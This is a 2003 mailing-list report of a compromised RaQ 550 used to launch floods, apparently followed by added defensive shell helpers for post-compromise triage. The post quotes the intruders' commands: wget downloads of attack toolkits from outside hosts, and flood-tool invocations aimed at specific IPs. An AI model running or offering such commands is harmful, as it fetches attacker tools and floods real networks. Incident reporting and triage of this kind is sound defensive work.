Might be a good idea to contact the owner of the box at prohosting.
----- Original Message -----
From: "Tik & Klik Internetdiensten" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, October 06, 2003 3:14 PM
Subject: [cobalt-security] raq 550 hacked

> Hello,
>
> This weekend it looks like a RaQ 550 of mine was hacked.
> I tracked some processes that were flooding.
> The program was called vladimII.
>
> It was run under the name of a user that had SSH access.
> When I blocked this user, it started a day later with another user.
>
> These 2 users are from different sites on the same machine,
> but these 2 users are from the same person.
> Tracking the IPs, I came out in Washington,
> but the user is Dutch, so it looks like someone hacked his computer to
> retrieve his passwords?
>
> Is there a way to look if the RaQ is infected, or will blocking this user's
> SSH access be enough?
> The program was running from the /home/tmp dir, in the folder flood; a list
> is below.
> The file broadcast.txt has 2102 IPs in it.
>
> I also have saved the bash history of the 2 users.
> There are several programs that were downloaded to my server.
> I shortened the bash history to the programs that were downloaded, below this mail.
>
> Please advise.
>
> ----------
> -rwxr-xr-x 1 xxx users 22446 Feb  9  2001 alpha
> -rwxr-xr-x 1 xxx users 23521 Aug 17  2000 bloop
> -rw-r--r-- 1 xxx users 31909 Aug 22  2001 broadcast.txt
> -rwxr-xr-x 1 xxx users 26981 May  9 01:10 cw
> -rwxr-xr-x 1 xxx users  2250 Apr 11  2001 da.sh
> -rwxr-xr-x 1 xxx users 24747 Mar 10  1996 juno
> -rwxr-xr-x 1 xxx users 25285 Aug 17  2000 nestea
> -rwxr-xr-x 1 xxx users 24577 Oct  3  2000 overdrop
> -rwxr-xr-x 1 xxx users 22803 Oct 17  2000 rc8
> -rwxr-xr-x 1 xxx users 28910 Sep  7  2000 s
> -rwxr-xr-x 1 xxx users 24786 Mar 10  1996 sl
> -rwxr-xr-x 1 xxx users 17027 Feb  9  2001 sl2
> -rwxr-xr-x 1 xxx users 17027 Mar  2  2001 sl3
> -rwxr-xr-x 1 xxx users 17027 Aug 22  2001 slice2
> -rwxr-xr-x 1 xxx users 14883 May 13  2001 slice3
> -rwxr-xr-x 1 xxx users 33962 Oct 17  2000 smack
> -rwxr-xr-x 1 xxx users 31558 Feb 18  2001 smurf5
> -rwxr-xr-x 1 xxx users 39382 Sep  7  2001 smurf6
> -rw-r--r-- 1 xxx users 19008 Aug 22  2001 smurf6-linux+LPG.c
> -rwxr-xr-x 1 xxx users 22158 Aug  6  2000 stealth
> -rwxr-xr-x 1 xxx users 15087 May 13  2001 stream
> -rwxr-xr-x 1 xxx users 15151 May 13  2001 stream2
> -rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super
> -rwxr-xr-x 1 xxx users 23671 May 13  2001 synhose
> -rwxr-xr-x 1 xxx users 26449 Feb  7  1996 synk
> -rwxr-xr-x 1 xxx users 15687 May 13  2001 synk7
> -rwxr-xr-x 1 xxx users 16519 May 13  2001 synsend
> -rwxr-xr-x 1 xxx users 23587 May 13  2001 trash
> -rwxr-xr-x 1 xxx users 26252 May 13  2001 trash2
> -rwxr-xr-x 1 xxx users 22741 Nov  8  2000 udp
> -rwxr-xr-x 1 xxx users 22446 Aug 22  2001 vadimI
> -rwxr-xr-x 1 xxx users  2635 Aug 22  2001 vadimI.c
> -rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
> -rwxr-xr-x 1 xxx users 13607 May 13  2001 xdestroy
> -rwxr-xr-x 1 xxx users 15119 May 13  2001 xshock
>
> -----
> bash history
> wget www.ps-lov.us/pizda.tgz
> wget snow.prohosting.com/muiemuie/p.tar.gz
> wget snow.prohosting.com/muiemuie/p.tgz
> wget snow.prohosting.com/muiemuie/km3.tgz
> wget 65.113.119.133/muiemuie/km3.tgz
>
> It runs programs like
> ./super 69.65.48.23 53 nasa.gov
> ./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
> ./cw 210.0.204.185
> ./stealth 210.0.204.185 6500000000000
> ./super 64.207.19.6 53 nasa.gov
>
>
> _______________________________________________
> cobalt-security mailing list
> [EMAIL PROTECTED]
> http://list.cobalt.com/mailman/listinfo/cobalt-security
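The poster's triage consisted of three steps: spotting the flooding processes, finding the toolkit they were started from, and pulling the download URLs out of the users' bash history. The helpers below, added here as an example and not part of either post, automate those steps in POSIX sh on a Linux box. The sample history lines and process records used to exercise them are constructed; the UIDs, PIDs and the search directories are assumptions, not data from the thread.

```sh
#!/bin/sh
# Post-compromise triage helpers (added example; not from the cobalt-security thread).

# Emit "UID PID EXE" for every running process. /proc/PID/exe is resolved so a
# binary launched as ./vadimII from /home/tmp/flood shows its real path; the
# kernel appends " (deleted)" if the attacker removed the file after starting it.
collect_procs() {
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        uid=$(awk '/^Uid:/ { print $2; exit }' "$p/status" 2>/dev/null)
        printf '%s %s %s\n' "${uid:-?}" "$pid" "$exe"
    done
}

# Filter "UID PID EXE" lines (from collect_procs or a saved capture), keeping
# processes whose binary lives somewhere an unprivileged user can write.
# Directories listed here are an assumption about typical hosting layouts.
flag_suspicious() {
    awk '$3 ~ /^\/(home|tmp|var\/tmp|dev\/shm)\//'
}

# List executable regular files owned by a user under the given directories
# (default: /home /tmp /var/tmp). This is where the posted toolkit lived.
find_user_tools() {
    fut_user=$1; shift
    [ $# -gt 0 ] || set -- /home /tmp /var/tmp
    find "$@" -xdev -type f -user "$fut_user" -perm -100 2>/dev/null
}

# Print every URL fetched with wget or curl in a bash history file, skipping
# option flags and the value of -O/-o/-P so only the remote location remains.
extract_downloads() {
    awk '
        $1 == "wget" || $1 == "curl" {
            for (i = 2; i <= NF; i++) {
                if ($i == "-O" || $i == "-o" || $i == "-P") { i++; continue }
                if ($i ~ /^-/) continue
                print $i
            }
        }' "$1"
}

# Usage on a live box (run as root, after copying .bash_history files aside):
#   collect_procs | flag_suspicious
#   find_user_tools xxx
#   extract_downloads /home/xxx/.bash_history
```

Run the process check before killing anything: once the flooders are stopped, `/proc/PID/exe` is gone and the only remaining lead is the toolkit directory itself. The download URLs are what the reply above has in mind when it suggests contacting the host serving them.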
